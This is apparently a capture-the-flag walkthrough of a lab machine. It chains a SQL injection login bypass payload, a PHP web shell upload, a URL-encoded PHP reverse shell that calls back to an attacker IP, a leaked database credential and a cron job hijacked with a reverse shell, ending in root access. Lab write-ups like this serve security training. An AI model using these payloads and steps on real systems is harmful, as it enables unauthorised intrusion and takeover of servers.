Target IP: 10.10.22.19
Everything here is plotted! Enumeration is key!
There are three TCP ports open on the target machine: SSH on 22, HTTP on 80, and another HTTP on 445.
Port 445: HTTP
Doing a directory search against this port shows the interesting directory /management, as shown above.
The webpage of /management is shown above. I do not have the credentials. I did try default credentials, such as admin:admin but it did not work.
However, this website is vulnerable to SQL injection. Using the payload admin' OR '1'='1' -- // as the input for the username, I bypassed the authentication mechanism. Now I have access to the web application on this port as the user admin.
The User List feature can be used to change the user account details. I noticed the picture of the admin user can be changed to anything, as all file types are supported including PHP!
I created a simple PHP web shell and changed the avatar picture of the user admin to this web shell shell.php. This uploaded successfully, but where is my shell?
I found the location of my uploaded web shell while doing a source-code review. It was uploaded at /management/uploads with the file name as 1691847900_shell.php.
And bingo! Sending the payload id;whoami, I received the output above. Time to upgrade this to a reverse shell connection!
Since the target machine is already using PHP, I can use a PHP reverse shell script. The PHP reverse shell script with URL encoding I used is php%20-r%20%27%24sock%3Dfsockopen%28%2210.14.55.153%22%2C8444%29%3Bshell_exec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27.
I started a listener on port 8444 and deployed the payload. Then I received a reverse shell connection on port 8444! Now I have a foothold on the target machine.
The full URL with PHP payload: http://10.10.22.19:445/management/uploads/1691847900_shell.php?cmd=php%20-r%20%27%24sock%3Dfsockopen%28%2210.14.55.153%22%2C8444%29%3Bshell_exec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27
The initialize.php contains the credential tms_user:Password@123 for the database application.
After running the command find / -perm -u=s 2>/dev/null, I notice an interesting binary /usr/bin/doas. After enumerating this binary more, I notice the user plot_admin can run the command openssl with root privileges without entering password. Now I need to escalate my privileges to this user.
Using the credentials tms_user:Password@123, I gained access to the MySQL application on the target machine. There is a database called tms_db with an interesting table called users. This table contains the two entries above. Is the puser the plot_admin?
I cracked the password hash 1254737c076cf867dc53d60a0364f38e using crackstation. This gave me the password jsmith123, as shown above. However, this password did not work against the user plot_admin.
After some more enumeration, I found an interesting cronjob that is executed by plot_admin user. I cannot modify the script itself; however, I can modify the contents of the directory which the script is at.
I renamed the original backup.sh to backup_old.sh. Then I inserted my reverse shell script inside the backup.sh and changed its permission to 777 so it can be executable. I started a listener on 8445, and after some time I got a connection back with the session as plot_admin!
From previous enumeration, I found the binary doas. I used this to read the root.txt flag. GG.
The user.txt flag.
The root.txt hash.